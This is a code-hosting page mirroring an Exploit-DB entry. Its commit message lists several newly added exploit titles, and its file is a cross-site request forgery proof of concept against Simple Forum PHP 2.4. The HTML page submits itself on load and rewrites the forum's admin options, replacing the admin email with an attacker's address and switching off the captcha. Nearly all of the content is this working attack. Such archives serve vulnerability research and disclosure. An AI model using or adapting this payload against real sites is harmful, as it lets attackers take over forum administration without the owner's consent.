bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40532.html
Offensive Security 113ab3e40e DB: 2016-10-15 
4 new exploits

Open-Xchange App Suite 7.8.2 - Cross Site Scripting
Open-Xchange App Suite 7.8.2 - Cross-Site Scripting

Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting
Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting

Vifi Radio v1 - Cross-Site Request Forgery
Vifi Radio 1.0 - Cross-Site Request Forgery

b374k Web Shell - Cross-Site Request Forgery / Command Injection
b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection

PHP Press Release - Stored Cross Site Scripting
PHP Press Release - Persistent Cross-Site Scripting

ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting
ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting
ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
OpenCimetiere v3.0.0-a5 - Blind SQL Injection
ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting
OpenCimetiere 3.0.0-a5 - Blind SQL Injection

Colorful Blog - Stored Cross Site Scripting
Colorful Blog - Persistent Cross-Site Scripting
Simple Forum PHP 2.4 - SQL Injection
Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
2016-10-15 05:01:17 +00:00

39 lines
1.4 KiB
HTML
Executable file
Raw Blame History

<!--
=====================================================
# Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# Exploit:
-->
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="act" value="updateOptionsAdmin" />
<input type="hidden" name="email" value="attacker@mail.com" />
<input type="hidden" name="captcha" value="nocap" /> <!--Set No
Captcha(unsecured)-->
<input type="hidden" name="captcha_theme" value="White theme" />
<input type="hidden" name="items_link"
value="http://localhost/demo_forum.php" />
<input type="hidden" name="time_zone" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<!--
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
-->
Reference in a new issue View git blame Copy permalink